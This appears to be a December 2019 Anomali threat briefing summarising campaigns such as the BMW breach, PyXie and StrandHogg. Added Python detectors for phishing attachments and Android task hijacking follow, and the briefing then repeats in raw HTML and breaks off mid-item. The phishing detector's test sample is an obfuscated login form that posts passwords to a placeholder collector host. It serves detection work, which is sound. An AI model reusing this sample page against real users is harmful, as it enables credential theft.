Weekly Threat Briefing: BMW Hacked By Hackers

The intelligence in this week’s iteration discusses the following threats: APT33, BankBot, CyrusOne, Dridex, Magecart, Python, PyXie, OceanLotus, REvil, StrandHogg.

Anomali Threat Research
December 10, 2019
<div id="weekly"><p>The intelligence in this week’s iteration discusses the following threats: <strong>APT33, BankBot, CyrusOne, Dridex, Magecart, Python, PyXie, OceanLotus, REvil, StrandHogg</strong>. The IOCs related to these stories are attached to the Community Threat Briefing and can be used to check your logs for potential malicious activity.</p>
<p id="intro"><img src="https://anomali-labs-public.s3.amazonaws.com/img/532903.png"/><br/> <b>Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.</b></p>
<div id="trending-threats"><h2 id="trendingthreats">Trending Threats</h2>
<p><a href="https://www.bleepingcomputer.com/news/security/clever-microsoft-phishing-scam-creates-a-local-login-form/" target="_blank"><b>Clever Microsoft Phishing Scam Creates A Local Login Form</b></a> (<i>December 7, 2019</i>)<br/> A phishing campaign has been identified by ISC handler Jan Kopriva. Rather than redirecting the user to another site, as is typical, the campaign carries the landing page inside a Hypertext Markup Language (HTML) attachment. The HTML file is sent as an attachment to a phishing email and contains a large amount of obfuscated JavaScript. Once opened, it renders a login form in the user’s browser for a number of email providers, including AOL, Gmail, Hotmail, Office 365, and Yahoo, and any credentials entered are sent to a remote site. Because the login form is generated locally, the threat actor can evade detection and does not need to register domains.<br/> <a href="https://forum.anomali.com/t/clever-microsoft-phishing-scam-creates-a-local-login-form/4421" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947201">[MITRE ATT&amp;CK] Scripting - T1064</a> | <a href="https://ui.threatstream.com/ttp/947087">[MITRE ATT&amp;CK] Credential Dumping - T1003</a> | <a href="https://ui.threatstream.com/ttp/947180">[MITRE ATT&amp;CK] Spearphishing Attachment - T1193</a></p>
<p><a href="https://www.tagesschau.de/investigativ/br-recherche/bmw-hacker-101.html" target="_blank"><b>BMW Hacked By Hackers</b></a> (<i>December 6, 2019</i>)<br/> Malicious actors have breached BMW’s computer systems. Using the “Cobalt Strike” malware, the threat actors were able to gain remote access to gather information and control the systems. The actors gathered information from the compromised system to help spread to further systems. Based on the methods and tools used in this attack, a Vietnamese group with suspected state ties, called “OceanLotus”, is believed to be responsible. According to Dror-John Röcher of the Deutsche Cybersicherheitsorganisation (DCSO), an IT security firm, OceanLotus began targeting automotive companies around the time Vietnam started building cars. A security expert states that no sensitive data should have been leaked as a result of this breach.<br/> <a href="https://forum.anomali.com/t/bmw-hacked-by-hackers/4422" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947278">[MITRE ATT&amp;CK] Remote File Copy - T1105</a> | <a href="https://ui.threatstream.com/ttp/947125">[MITRE ATT&amp;CK] System Information Discovery - T1082</a> | <a href="https://ui.threatstream.com/ttp/947269">[MITRE ATT&amp;CK] Access Token Manipulation - T1134</a> | <a href="https://ui.threatstream.com/ttp/947257">[MITRE ATT&amp;CK] BITS Jobs - T1197</a> | <a href="https://ui.threatstream.com/ttp/947258">[MITRE ATT&amp;CK] Bypass User Account Control - T1088</a> | <a href="https://ui.threatstream.com/ttp/947191">[MITRE ATT&amp;CK] Command-Line Interface - T1059</a> | <a href="https://ui.threatstream.com/ttp/947291">[MITRE ATT&amp;CK] Commonly Used Port - T1043</a> | <a href="https://ui.threatstream.com/ttp/947289">[MITRE ATT&amp;CK] Custom Command and Control Protocol - T1094</a> | <a href="https://ui.threatstream.com/ttp/947130">[MITRE ATT&amp;CK] Execution through API - T1106</a> | <a href="https://ui.threatstream.com/ttp/947244">[MITRE ATT&amp;CK] Exploitation for Client Execution - T1203</a> | <a href="https://ui.threatstream.com/ttp/947194">[MITRE ATT&amp;CK] Indicator Removal on Host - T1070</a> | <a href="https://ui.threatstream.com/ttp/947276">[MITRE ATT&amp;CK] Network Service Scanning - T1046</a> | <a href="https://ui.threatstream.com/ttp/947287">[MITRE ATT&amp;CK] PowerShell - T1086</a> | <a href="https://ui.threatstream.com/ttp/947207">[MITRE ATT&amp;CK] Process Discovery - T1057</a> | <a href="https://ui.threatstream.com/ttp/947127">[MITRE ATT&amp;CK] Scheduled Task - T1053</a> | <a href="https://ui.threatstream.com/ttp/947126">[MITRE ATT&amp;CK] Standard Application Layer Protocol - T1071</a> | <a href="https://ui.threatstream.com/ttp/947231">[MITRE ATT&amp;CK] Valid Accounts - T1078</a> | <a href="https://ui.threatstream.com/ttp/947077">[MITRE ATT&amp;CK] Windows Management Instrumentation - T1047</a></p>
<p><a href="https://www.bleepingcomputer.com/news/security/us-govt-alerts-financial-services-of-ongoing-dridex-malware-attacks/" target="_blank"><b>US Govt Alerts Financial Services of Ongoing Dridex Malware Attacks</b></a> (<i>December 5, 2019</i>)<br/> The US Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning to financial services organizations about ongoing Dridex attacks. Dridex is a modular banking trojan, attributed to the threat group TA505, that targets financial organizations via phishing in an attempt to steal banking credentials. CISA has provided a list of recommendations for companies to enact to help prevent an attack, covering education on connected devices, macros, network controls, password management, and phishing.<br/> <a href="https://forum.anomali.com/t/us-govt-alerts-financial-services-of-ongoing-dridex-malware-attacks/4423" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947087">[MITRE ATT&amp;CK] Credential Dumping - T1003</a> | <a href="https://ui.threatstream.com/ttp/947190">[MITRE ATT&amp;CK] Connection Proxy - T1090</a> | <a href="https://ui.threatstream.com/ttp/947126">[MITRE ATT&amp;CK] Standard Application Layer Protocol - T1071</a> | <a href="https://ui.threatstream.com/ttp/947150">[MITRE ATT&amp;CK] Standard Cryptographic Protocol - T1032</a></p>
<p><a href="https://www.zdnet.com/article/ransomware-attack-hits-major-us-data-center-provider/" target="_blank"><b>Ransomware Attack Hits Major US Data Center Provider</b></a> (<i>December 5, 2019</i>)<br/> ZDNet reports that CyrusOne, one of the largest data center providers in the US, has been hit by REvil ransomware. The company has not disclosed details of the targeted attack. CyrusOne reportedly is not planning to pay the ransom and is working with law enforcement to investigate and to help customers restore lost data.<br/> <a href="https://forum.anomali.com/t/ransomware-attack-hits-major-us-data-center-provider/4424" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947266">[MITRE ATT&amp;CK] Data Encrypted - T1022</a><br/> <b>Tags:</b> CyrusOne, Ransomware, REvil</p>
<p><a href="https://www.darkreading.com/vulnerabilities---threats/attackers-can-circumvent-outlook-homepage-flaw/d/d-id/1336513" target="_blank"><b>Attackers Continue to Exploit Outlook Home Page Flaw</b></a> (<i>December 4, 2019</i>)<br/> A two-year-old vulnerability in Microsoft Outlook continues to be exploited. The vulnerability, registered as “CVE-2017-11774”, allows code to run when the Outlook home page is opened. Although the vulnerability has been patched, threat actors have been able to maintain persistence on already-infected systems. According to the United States military, two Iranian Advanced Persistent Threat (APT) groups, APT33 and APT34, have been exploiting the vulnerability in their attacks. To gain persistence, the WebView registry key is modified with an external URL, which reverses the effect of the patch.<br/> <a href="https://forum.anomali.com/t/attackers-continue-to-exploit-outlook-home-page-flaw/4425" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947166">[MITRE ATT&amp;CK] Modify Registry - T1112</a></p>
<p><a href="https://www.openwall.com/lists/oss-security/2019/12/05/1" target="_blank"><b>CVE-2019-14899 Inferring and Hijacking VPN-Tunneled TCP</b></a> (<i>December 4, 2019</i>)<br/> A vulnerability, registered as “CVE-2019-14899”, has been identified in most Linux/Unix-based systems, including Android, iOS, and macOS. The vulnerability enables an actor to determine whether a user is connected to a VPN and to infer information about the sequence of the tunneled traffic, allowing data to be injected into the TCP stream. An attack proceeds by the actor gathering the VPN client’s virtual IP address, using it to determine active connections, and then determining the packet sequence numbers of those connections in order to hijack the TCP stream.<br/> <a href="https://forum.anomali.com/t/cve-2019-14899-inferring-and-hijacking-vpn-tunneled-tcp/4426" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947291">[MITRE ATT&amp;CK] Commonly Used Port - T1043</a></p>
<p><a href="https://www.zdnet.com/article/two-malicious-python-libraries-removed-from-pypi/" target="_blank"><b>Two Malicious Python Libraries Caught Stealing SSH and GPG Keys</b></a> (<i>December 4, 2019</i>)<br/> Two Python libraries have been removed from PyPI by the Python Security Team after they were found to steal SSH and GPG keys from Python projects. Both libraries used typosquatting to imitate legitimate libraries: “dateutil”, a popular date library, and “jellyfish”, a string-comparison library. The malicious jellyfish package downloads a file that lists directories and attempts to exfiltrate the user’s SSH and GPG keys to a remote IP address. Because the malicious libraries also contained the original, legitimate code, the packages worked as intended, allowing the malicious code to go unnoticed until developers raised concerns.<br/> <a href="https://forum.anomali.com/t/two-malicious-python-libraries-caught-stealing-ssh-and-gpg-keys/4427" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947224">[MITRE ATT&amp;CK] Exfiltration Over Alternative Protocol - T1048</a> | <a href="https://ui.threatstream.com/ttp/947215">[MITRE ATT&amp;CK] Accessibility Features - T1015</a></p>
<p><a href="https://securityintelligence.com/posts/new-destructive-wiper-zerocleare-targets-energy-sector-in-the-middle-east/" target="_blank"><b>New Destructive Wiper ZeroCleare Targets Energy Sector in the Middle East</b></a> (<i>December 4, 2019</i>)<br/> Malware targeting the industrial and energy sectors in the Middle East has been named “ZeroCleare” by researchers at IBM X-Force. The malware is a wiper that uses a legitimate EldoS tool for interacting with files, disks, and partitions to wipe the master boot record (MBR) and damage disk partitions. By brute-forcing passwords, the actors gain access to network accounts that are then used to deploy China Chopper and Tunna web shells. Credential harvesters such as Mimikatz are used to gather and exfiltrate credentials from the victim’s computer. X-Force has determined that actors from OilRig, an Iranian-backed group, and another unnamed, likely Iran-based threat group are behind the campaign.<br/> <a href="https://forum.anomali.com/t/new-destructive-wiper-zerocleare-targets-energy-sector-in-the-middle-east/4428" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947287">[MITRE ATT&amp;CK] PowerShell - T1086</a> | <a href="https://ui.threatstream.com/ttp/947277">[MITRE ATT&amp;CK] Exfiltration Over Physical Medium - T1052</a> | <a href="https://ui.threatstream.com/ttp/947087">[MITRE ATT&amp;CK] Credential Dumping - T1003</a></p>
<p><a href="https://blog.malwarebytes.com/web-threats/2019/12/theres-an-app-for-that-web-skimmers-found-on-paas-heroku/" target="_blank"><b>There's An App For That: Web Skimmers Found on PaaS Heroku</b></a> (<i>December 4, 2019</i>)<br/> Malwarebytes Labs security researchers have identified skimmers being hosted on Heroku, a cloud Platform-as-a-Service (PaaS). The web-skimming app is injected into e-commerce websites with a payment overlay that steals the victim’s payment card details, which are then exfiltrated in an encoded format. Because of Heroku’s freemium model, threat actors can host skimming code at low cost, and detection is harder because the hosting domain is legitimate.<br/> <a href="https://forum.anomali.com/t/theres-an-app-for-that-web-skimmers-found-of-paas-heroku/4429" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947201">[MITRE ATT&amp;CK] Scripting - T1064</a></p>
<p><a href="https://threatvector.cylance.com/en_us/home/meet-pyxie-a-nefarious-new-python-rat.html" target="_blank"><b>Meet PyXie: A Nefarious New Python RAT</b></a> (<i>December 2, 2019</i>)<br/> Cylance researchers have identified a Python Remote Access Trojan (RAT) dubbed “PyXie”. While it has been in the wild since at least 2018, the RAT has now been observed in an ongoing campaign targeting multiple industries, including education and healthcare, in an attempt to deliver ransomware. The malware is sideloaded by a legitimate binary together with an encrypted payload; these are copied to a directory, and a registry value is created for persistence. The third-stage payload, a “Cobalt Mode” downloader, is injected into a process selected by searching the System32 directory against a set of criteria. Cobalt Mode connects to a Command and Control (C2) server, downloads and decrypts the payload, and carries out environmental checks. PyXie RAT is the final-stage payload, with capabilities including credential harvesting, cookie theft, input and output capture, running arbitrary payloads, web injects, and Virtual Network Computing (VNC).<br/> <a href="https://forum.anomali.com/t/meet-pyxie-a-nefarious-new-python-rat/4430" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947142">[MITRE ATT&amp;CK] Process Injection - T1055</a> | <a href="https://ui.threatstream.com/ttp/947243">[MITRE ATT&amp;CK] Input Capture - T1056</a> | <a href="https://ui.threatstream.com/ttp/947079">[MITRE ATT&amp;CK] Screen Capture - T1113</a> | <a href="https://ui.threatstream.com/ttp/947266">[MITRE ATT&amp;CK] Data Encrypted - T1022</a> | <a href="https://ui.threatstream.com/ttp/947166">[MITRE ATT&amp;CK] Modify Registry - T1112</a> | <a href="https://ui.threatstream.com/ttp/947087">[MITRE ATT&amp;CK] Credential Dumping - T1003</a> | <a href="https://ui.threatstream.com/ttp/947136">[MITRE ATT&amp;CK] Deobfuscate/Decode Files or Information - T1140</a></p>
<p><a href="https://safebreach.com/Post/Autodesk-Desktop-Application-Privilege-Escalation-to-SYSTEM-N40-CVE-2019-7365-N41" target="_blank"><b>Autodesk Desktop Application - Privilege Escalation to SYSTEM (CVE-2019-7365)</b></a> (<i>December 2, 2019</i>)<br/> Researchers at SafeBreach Labs have discovered a vulnerability in the Autodesk Desktop Application (ADA) that can be used to achieve privilege escalation and persistence on Windows desktop systems. ADA is a companion application to Microsoft Windows-based products that delivers security patches and updates to subscribers. The vulnerability, “CVE-2019-7365,” is a DLL preloading vulnerability that lets a malicious actor have a malicious DLL file placed in the working directory loaded and executed. It can be leveraged to load and execute payloads each time the service starts, providing persistence, and the actor can then operate as NT AUTHORITY\SYSTEM, the most powerful administrative account on a local Windows instance. SafeBreach reported the vulnerability to Autodesk, and a patch has been available since November 27.<br/> <a href="https://forum.anomali.com/t/autodesk-desktop-application-privilege-escalation-to-system-cve-2019-7365/4431" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947232">[MITRE ATT&amp;CK] DLL Side-Loading - T1073</a></p>
<p><a href="https://www.bleepingcomputer.com/news/security/actively-exploited-strandhogg-vulnerability-affects-android-os/" target="_blank"><b>Actively Exploited StrandHogg Vulnerability Affects Android OS</b></a> (<i>December 2, 2019</i>)<br/> The newly identified Android vulnerability, named “StrandHogg” by Promon researchers, is being exploited by the BankBot banking Trojan. If exploited, the vulnerability enables a malicious application to masquerade as a legitimate one, due to a flaw in the Android “taskAffinity” setting that allows any app to assume the identity of another app in the multitasking system. An attacker can then access the microphone and camera, obtain location data, read SMS messages, and request permissions that enable the theft of credentials and banking information. Currently, 36 applications, including BankBot, have been identified as exploiting the vulnerability.<br/> <a href="https://forum.anomali.com/t/actively-exploited-strandhogg-vulnearbility-affects-android-os/4432" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/1260052">[MITRE MOBILE-ATT&amp;CK] Access Contact List - T1432</a> | <a href="https://ui.threatstream.com/ttp/1260088">[MITRE MOBILE-ATT&amp;CK] Location Tracking - T1430</a> | <a href="https://ui.threatstream.com/ttp/1260117">[MITRE MOBILE-ATT&amp;CK] Standard Application Layer Protocol - T1437</a> | <a href="https://ui.threatstream.com/ttp/1260119">[MITRE MOBILE-ATT&amp;CK] System Information Discovery - T1426</a></p></div></div>
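The local-login-form phishing technique in the first item above lends itself to a content check on inbound HTML attachments. The following Python script is an added example, not code from the briefing, from Anomali or from any vendor named above. It parses an HTML attachment and flags the combination the item describes: a password field, a form that posts to a remote host, and inline JavaScript that leans on decoding calls or long encoded blobs. Both sample attachments are constructed for this example, and the collector hostname inside them is a placeholder.

```python
import re
from html.parser import HTMLParser

# Constructed sample: an ordinary HTML newsletter attachment (not from the page).
BENIGN_HTML = """<html><body><h1>Monthly update</h1>
<p>Read the full story on our site.</p><a href="https://example.org/news">More</a>
</body></html>"""

# Constructed sample modelled on the campaign described above: the whole
# credential-harvesting page ships inside the attachment, decodes itself with
# obfuscation helpers and posts whatever is typed to a remote host (placeholder name).
PHISH_HTML = """<html><body><script>
var p = "PHNjcmlwdD5kb2N1bWVudC53cml0ZSgnPGZvcm0gYWN0aW9uPSJodHRwczovL2NvbGxlY3Rvci5leGFtcGxlL3Bvc3QiPicpOzwvc2NyaXB0Pg==";
document.write(unescape(atob(p)));
</script>
<form action="https://collector.example/post" method="post">
  <input type="email" name="user"><input type="password" name="pass">
</form></body></html>"""


class _Collector(HTMLParser):
    """Collects form actions, input types and inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.input_types = []
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_actions.append((a.get("action") or "").strip())
        elif tag == "input":
            self.input_types.append((a.get("type") or "text").lower())
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # html.parser hands script bodies to handle_data while in CDATA mode
        if self._in_script:
            self.scripts.append(data)


# Decoding / dynamic-write helpers that obfuscated droppers typically chain together.
OBFUSCATION_CALLS = re.compile(
    r"\b(unescape|atob|String\.fromCharCode|eval|document\.write)\s*\(")
# A long run of base64 / percent-encoded characters inside script text.
LONG_BLOB = re.compile(r"[A-Za-z0-9+/=%]{60,}")


def score_html_attachment(html):
    """Return {'verdict': 'suspicious'|'benign', 'indicators': [...]} for one attachment."""
    c = _Collector()
    c.feed(html)
    script_text = "\n".join(c.scripts)
    indicators = []
    if "password" in c.input_types:
        indicators.append("password_field")
    if any(act.lower().startswith(("http://", "https://")) for act in c.form_actions):
        indicators.append("form_posts_to_remote_host")
    calls = sorted(set(OBFUSCATION_CALLS.findall(script_text)))
    if calls:
        indicators.append("obfuscation_calls:" + ",".join(calls))
    if LONG_BLOB.search(script_text):
        indicators.append("long_encoded_blob")
    # A password field alone is not enough (local intranet forms exist); require
    # at least one corroborating sign that the page is built to exfiltrate.
    verdict = "suspicious" if "password_field" in indicators and len(indicators) >= 2 else "benign"
    return {"verdict": verdict, "indicators": indicators}


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_HTML), ("phish", PHISH_HTML)):
        print(label, score_html_attachment(doc))
```

The verdict needs a password field plus at least one corroborating indicator, so a plain newsletter or a script-free local form stays benign. Treat the result as a triage signal that routes the attachment to a sandbox or a detonation queue, not as a block rule, and tune the regexes to the JavaScript you actually see in your own mail flow.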
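For the StrandHogg item, an app-vetting pipeline can at least triage manifests for the task-affinity shape the item describes. This Python example is added here and is not code from Promon, from Anomali or from the briefing. It parses an AndroidManifest.xml and reports activities whose `android:taskAffinity` points outside their own package, and activities that set `android:allowTaskReparenting`, a related setting from the earlier task-hijacking research that the briefing itself does not mention (that pairing is this example's assumption). Both manifests and their package names are constructed placeholders.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"


def _attr(elem, name):
    """Read an android:-namespaced attribute, or None when absent."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


# Constructed manifest: an app whose launcher activity declares affinity with a
# different package's task, the manifest-level shape a task-hijacking overlay relies on.
SUSPICIOUS_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.flashlight">
  <application android:label="Flashlight">
    <activity android:name=".MainActivity"
              android:taskAffinity="com.example.targetbank"
              android:allowTaskReparenting="true"
              android:excludeFromRecents="true">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
  </application>
</manifest>"""

# Constructed manifest: an app that leaves affinity at its default (its own package).
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.notes">
  <application android:label="Notes">
    <activity android:name=".MainActivity"/>
    <activity android:name=".Editor" android:taskAffinity="com.example.notes.editor"/>
  </application>
</manifest>"""


def find_task_affinity_findings(manifest_xml):
    """Return a list of (activity_name, reason) for activities whose task settings
    claim another package's task or allow re-parenting between tasks."""
    root = ET.fromstring(manifest_xml)
    own_pkg = root.get("package") or ""
    app = root.find("application")
    findings = []
    if app is None:
        return findings
    # <application> may set a default affinity that every activity inherits.
    app_affinity = _attr(app, "taskAffinity")
    for act in app.iter("activity"):
        name = _attr(act, "name") or "?"
        affinity = _attr(act, "taskAffinity") or app_affinity
        # An empty affinity ("") is a legitimate hardening choice; only a non-empty
        # affinity that is neither the package nor a sub-name of it is reported.
        if affinity and affinity != own_pkg and not affinity.startswith(own_pkg + "."):
            findings.append((name, "taskAffinity '%s' does not belong to package %s"
                             % (affinity, own_pkg)))
        if (_attr(act, "allowTaskReparenting") or "false").lower() == "true":
            findings.append((name, "allowTaskReparenting=true"))
    return findings


if __name__ == "__main__":
    for label, m in (("benign", BENIGN_MANIFEST), ("suspicious", SUSPICIOUS_MANIFEST)):
        print(label, find_task_affinity_findings(m))
```

On a real APK the manifest is binary XML and needs decoding first (apktool or androguard output feeds this function unchanged). A hit is a review trigger, not proof of malice; the platform-side fix is what closes the hole, and this check only helps a store or an enterprise MDM spot candidates for manual analysis.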
Anomali Threat Research

Anomali's Threat Research team continually tracks security threats to identify when new, highly critical security threats emerge. The Anomali Threat Research team's briefings discuss current threats and risks like botnets, data breaches, misconfigurations, ransomware, threat groups, and various vulnerabilities. The team also creates free and premium threat intelligence feeds for Anomali's industry-leading Threat Intelligence Platform, ThreatStream.



<div id="weekly"><p>The intelligence in this week’s iteration discuss the following threats: <strong>APT33, BankBot, CryusOne, Dridex, Magecart, Python, PyXie, OceanLotus, REvil, StrangHogg</strong>, The IOCs related to these stories are attached to the Community Threat Briefing and can be used to check your logs for potential malicious activity.</p><p id="intro"><img src="https://anomali-labs-public.s3.amazonaws.com/img/532903.png "/><br/> <b>Figure 1 - IOC Summary Charts.  These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.</b></p><div id="trending-threats"><h2 id="trendingthreats">Trending Threats</h2><p><a href="https://www.bleepingcomputer.com/news/security/clever-microsoft-phishing-scam-creates-a-local-login-form/" target="_blank"><b>Clever Microsoft Phishing Scam Creates A Local Login Form</b></a> (<i>December 7, 2019</i>)<br/> A phishing campaign has been identified by ISC Handler, Jan Kopriva. The campaign contains the landing page inside a Hypertext Text Markup Language (HTML) attachment, as opposed to typically redirecting the user to another site. The HTML file is sent in a phishing email as an attachment, with the file containing a large amount of obfuscated Javascript. Once opened, a login form is opened in the user’s browser for a number of email providers including AOL, Gmail, Hotmail, Office 365, and Yahoo. These credentials are then sent to a remote site. 
With the login form being generated locally, the threat actor is able to go undetected, and do not need to register domains.<br/> <a href="https://forum.anomali.com/t/clever-microsoft-phishing-scam-creates-a-local-login-form/4421" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947201">[MITRE ATT&amp;CK] Scripting - T1064</a> | <a href="https://ui.threatstream.com/ttp/947087">[MITRE ATT&amp;CK] Credential Dumping - T1003</a> | <a href="https://ui.threatstream.com/ttp/947180">[MITRE ATT&amp;CK] Spearphishing Attachment - T1193</a><br/>  </p><p><a href="https://www.tagesschau.de/investigativ/br-recherche/bmw-hacker-101.html" target="_blank"><b>BMW Hacked By Hackers</b></a> (<i>December 6, 2019</i>)<br/> Malicious actors have breached BMW’s computer system. Using the “Cobalt Strike” malware, the threat actors were able to gain remote access to gather information and control the system. The actors gather information from the system in order to help spread and expand upon more systems. Due to the methods and tools used in this attack, it is believed a Vietnamese group, with suspected state ties, called “OceanLotus” are responsible. According to Dror-John Röcher from Deutsche Cybersicherheitsorganisation (DCSO), an IT security firm, OceanLotus began targeting automotive companies during the time Vietnam started building cars. 
A security expert claims no sensitive data should be leaked due to this breach.<br/> <a href="https://forum.anomali.com/t/bmw-hacked-by-hackers/4422" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947278">[MITRE ATT&amp;CK] Remote File Copy - T1105</a> | <a href="https://ui.threatstream.com/ttp/947125">[MITRE ATT&amp;CK] System Information Discovery - T1082</a> | <a href="https://ui.threatstream.com/ttp/947269">[MITRE ATT&amp;CK] Access Token Manipulation - T1134</a> | <a href="https://ui.threatstream.com/ttp/947257">[MITRE ATT&amp;CK] BITS Jobs - T1197</a> | <a href="https://ui.threatstream.com/ttp/947258">[MITRE ATT&amp;CK] Bypass User Account Control - T1088</a> | <a href="https://ui.threatstream.com/ttp/947191">[MITRE ATT&amp;CK] Command-Line Interface - T1059</a> | <a href="https://ui.threatstream.com/ttp/947291">[MITRE ATT&amp;CK] Commonly Used Port - T1043</a> | <a href="https://ui.threatstream.com/ttp/947289">[MITRE ATT&amp;CK] Custom Command and Control Protocol - T1094</a> | <a href="https://ui.threatstream.com/ttp/947130">[MITRE ATT&amp;CK] Execution through API - T1106</a> | <a href="https://ui.threatstream.com/ttp/947244">[MITRE ATT&amp;CK] Exploitation for Client Execution - T1203</a> | <a href="https://ui.threatstream.com/ttp/947194">[MITRE ATT&amp;CK] Indicator Removal on Host - T1070</a> | <a href="https://ui.threatstream.com/ttp/947276">[MITRE ATT&amp;CK] Network Service Scanning - T1046</a> | <a href="https://ui.threatstream.com/ttp/947287">[MITRE ATT&amp;CK] PowerShell - T1086</a> | <a href="https://ui.threatstream.com/ttp/947207">[MITRE ATT&amp;CK] Process Discovery - T1057</a> | <a href="https://ui.threatstream.com/ttp/947127">[MITRE ATT&amp;CK] Scheduled Task - T1053</a> | <a href="https://ui.threatstream.com/ttp/947126">[MITRE ATT&amp;CK] Standard Application Layer Protocol - T1071</a> | <a href="https://ui.threatstream.com/ttp/947231">[MITRE ATT&amp;CK] Valid 
Accounts - T1078</a> | <a href="https://ui.threatstream.com/ttp/947077">[MITRE ATT&amp;CK] Windows Management Instrumentation - T1047</a></p><p><a href="https://www.bleepingcomputer.com/news/security/us-govt-alerts-financial-services-of-ongoing-dridex-malware-attacks/" target="_blank"><b>US Govt Alerts Financial Services of Ongoing Dridex Malware Attacks</b></a> (<i>December 5, 2019</i>)<br/> The US Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning to financial services about ongoing Dridex attacks. Dridex is a modular banking trojan that targets financial organizations via phishing in attempts to steal banking credentials and has been attributed to the threat group, TA505. CISA have provided a list of recommendations for companies to enact to help prevent against an attack including education on connected devices, macros, network controls, password management, and phishing.<br/> <a href="https://forum.anomali.com/t/us-govt-alerts-financial-services-of-ongoing-dridex-malware-attacks/4423" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947087">[MITRE ATT&amp;CK] Credential Dumping - T1003</a> | <a href="https://ui.threatstream.com/ttp/947190">[MITRE ATT&amp;CK] Connection Proxy - T1090</a> | <a href="https://ui.threatstream.com/ttp/947126">[MITRE ATT&amp;CK] Standard Application Layer Protocol - T1071</a> | <a href="https://ui.threatstream.com/ttp/947150">[MITRE ATT&amp;CK] Standard Cryptographic Protocol - T1032</a></p><p><a href="https://www.zdnet.com/article/ransomware-attack-hits-major-us-data-center-provider/" target="_blank"><b>Ransomware Attack Hits Major US Data Center Provider</b></a> (<i>December 5, 2019</i>)<br/> One of the largest data center providers in the US, CyrusOne, has been hit by REvil ransomware, ZDNet are reporting. The attack, which was targeted against the company has not been disclosed by the company. 
CyrusOne reportedly are not planning on paying the ransom, and are working with law enforcement to investigate and help customers restore lost data.<br/> <a href="https://forum.anomali.com/t/ransomware-attack-hits-major-us-data-center-provider/4424" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947266">[MITRE ATT&amp;CK] <b>Tags:</b> CyrusOne, Ransomware, REvil</a></p><p><a href="https://www.darkreading.com/vulnerabilities---threats/attackers-can-circumvent-outlook-homepage-flaw/d/d-id/1336513" target="_blank"><b>Attackers Continue to Exploit Outlook Home Page Flaw</b></a> (<i>December 4, 2019</i>)<br/> A two-year old vulnerability in Microsoft Outlook is continuing to be exploited. The vulnerability, registered as “CVE-2017-11774”, allows code to run when the Outlook homepage is opened up. Although the vulnerability was patched, threat actors have been able to gain persistence on already infected systems. Two Iranian Advanced Persistent Groups (APT), APT33 and APT34 have been exploiting the vulnerability in their attacks, according to the United States military. To gain persistence, the WebView registry key is modified with an external URL in order to reverse the patch.<br/> <a href="https://forum.anomali.com/t/attackers-continue-to-exploit-outlook-home-page-flaw/4425" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947166">[MITRE ATT&amp;CK] Modify Registry - T1112</a></p><p><a href="https://www.openwall.com/lists/oss-security/2019/12/05/1" target="_blank"><b>CVE-2019-14899 Inferring and Hijacking VPN-Tunneled TCP</b></a> (<i>December 4, 2019</i>)<br/> A vulnerability, registered as “CVE-2019-14899”, has been identified on most Linux/Unix based systems including Android, iOS, and MacOS. 
